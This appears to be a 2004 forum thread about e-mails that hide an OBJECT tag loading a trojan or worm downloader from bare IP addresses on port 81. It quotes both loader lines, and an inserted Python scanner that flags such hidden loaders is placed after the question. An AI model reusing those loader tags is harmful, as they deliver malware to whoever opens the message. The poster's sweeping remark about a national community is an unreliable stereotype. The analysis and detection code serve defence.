Malicious ActiveX?
Original Message
Name: Grover
Date: March 18, 2004 at 10:01:03 Pacific
Subject: Malicious ActiveX?
OS: Win XP Pro
CPU/RAM: CPU 2.4 GHz / 512 MB

Comment: Someone sent my wife two curious e-mail messages. They displayed nothing because I have ActiveX turned off. The source revealed just:

    <html><body>
    <OBJECT STYLE="display:none" DATA="http://68.112.62.74:81/433419.php"> </OBJECT></body></html>

and

    <html><body>
    <OBJECT STYLE="display:none" DATA="http://68.107.23.153:81/713908.php"> </OBJECT></body></html>

Is this potentially malicious? The way the From: fields were disguised makes me suspicious. Reverse DNS lookup revealed that one was sent from Vancouver, where we live, while the other was sent from Japan. The To: address gives us a huge clue as to who might have sent it. I'm just wondering what the purpose was. To damage her computer?
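The hidden <OBJECT> loader quoted above, and the nonstandard port 81 pointed out in Response Number 4, are the kind of thing a mail gateway or an analyst's triage script can flag before any client renders the message. The following is an added example, not code from this thread or from any product named in it. It uses only Python's standard library; the sample bodies and the 192.0.2.x addresses are constructed placeholders (the documentation range), not the addresses from the thread.

```python
"""Flag HTML e-mail bodies that contain hidden elements loading remote content
(the <OBJECT STYLE="display:none" DATA="http://...:81/...php"> pattern).
Added example for this thread; stdlib only."""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample bodies. 192.0.2.0/24 is the documentation range; the real
# addresses quoted in the thread are deliberately not used here.
SUSPICIOUS_BODY = (
    '<html><body>'
    '<OBJECT STYLE="display:none" DATA="http://192.0.2.10:81/433419.php"> </OBJECT>'
    '</body></html>'
)
BENIGN_BODY = (
    '<html><body><p>Hi, see the attached photo.</p>'
    '<img src="cid:photo1@example.invalid"></body></html>'
)


def _is_ip_literal(host):
    """True when the host part of the URL is a bare IP address."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


class RemoteLoaderScanner(HTMLParser):
    """Collects every element that can pull remote content into the message."""

    # tag -> attribute that names the remote resource
    REMOTE_TAGS = {"object": "data", "iframe": "src", "embed": "src"}

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # html.parser already lower-cases tag and attribute names.
        if tag not in self.REMOTE_TAGS:
            return
        attr_map = {name: (value or "") for name, value in attrs}
        url = attr_map.get(self.REMOTE_TAGS[tag], "")
        parsed = urlparse(url)
        if parsed.scheme not in ("http", "https") or not parsed.hostname:
            return  # relative, cid:, or inline reference: not a remote fetch
        style = attr_map.get("style", "").replace(" ", "").lower()
        hidden = "display:none" in style or "visibility:hidden" in style
        port = parsed.port or (443 if parsed.scheme == "https" else 80)
        self.findings.append({
            "tag": tag,
            "url": url,
            "host": parsed.hostname,
            "port": port,
            "hidden": hidden,                         # nothing shown to the reader
            "nonstandard_port": port not in (80, 443),
            "ip_literal": _is_ip_literal(parsed.hostname),
        })


def scan_html(body):
    """Return a list of remote-loading elements found in an HTML body."""
    scanner = RemoteLoaderScanner()
    scanner.feed(body)
    scanner.close()
    return scanner.findings


def is_suspicious(body):
    """A body is suspicious when any remote loader is hidden from the reader,
    points at a bare IP address, or uses a port other than 80/443."""
    return any(f["hidden"] or f["ip_literal"] or f["nonstandard_port"]
               for f in scan_html(body))


if __name__ == "__main__":
    for label, body in (("suspicious", SUSPICIOUS_BODY), ("benign", BENIGN_BODY)):
        print(label, is_suspicious(body), scan_html(body))
```

Each of the three signals on its own (hidden element, IP-literal host, nonstandard port) is enough to quarantine for review; the original poster's messages would trip all three, while an ordinary newsletter with a visible image hosted on port 443 trips none. The scanner only inspects the message and never fetches the URL, which is the right posture for automated triage.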
Response Number 1
Name: peakinghard
Date: March 18, 2004 at 10:20:29 Pacific
Reply: Looking at the source of 713908.php, it does contain VBS scripting; it creates a file named sm.exe. It could be spyware, but it also could be a trojan of some sort.
Response Number 2
Name: blender
Date: March 18, 2004 at 10:38:52 Pacific
Reply: Hi. I tried those links (HTA apps). The 1st one is apparently infected with the VBS/Psyme trojan according to McAfee. 2nd one... same trojan. Likely was not on purpose... the From addresses were likely spoofed... Not much info here, but I didn't look hard either... at least you have a clue what might be going on. http://vil.nai.com/vil/content/v_100749.htm

I never give up! Windows Update
Response Number 3
Name: Grover
Date: March 18, 2004 at 11:41:43 Pacific
Reply: Thanks guys. I tried to load it into my browser, but I guess my security settings didn't allow it. Phew! We are pretty sure that it was on purpose simply because of the e-mail address it was sent to, and the reverse DNS lookup narrows things quite a bit more. I can make conjecture about the individual, but I can't be sure. My next step will be to search for the best method to contact the two service providers, see if I can get the individual's name and try to get them booted off the ISP. Failing that, I'll send them a cease and desist order that ought to leave a brown spot in their shorts. If our reasoning is correct, it seems like jealousy is the motivation. This kind of wiener behavior is apparently fairly common in the Japanese community. Thanks again. Cheers... Grover
Response Number 4
Name: DoveDude
Date: March 21, 2004 at 19:22:27 Pacific
Reply: This is a W32/Bagle.q@MM worm variant according to Network Associates; info found here: http://vil.nai.com/vil/content/v_101108.htm It is using port 81 to contact Internet locations to download the code.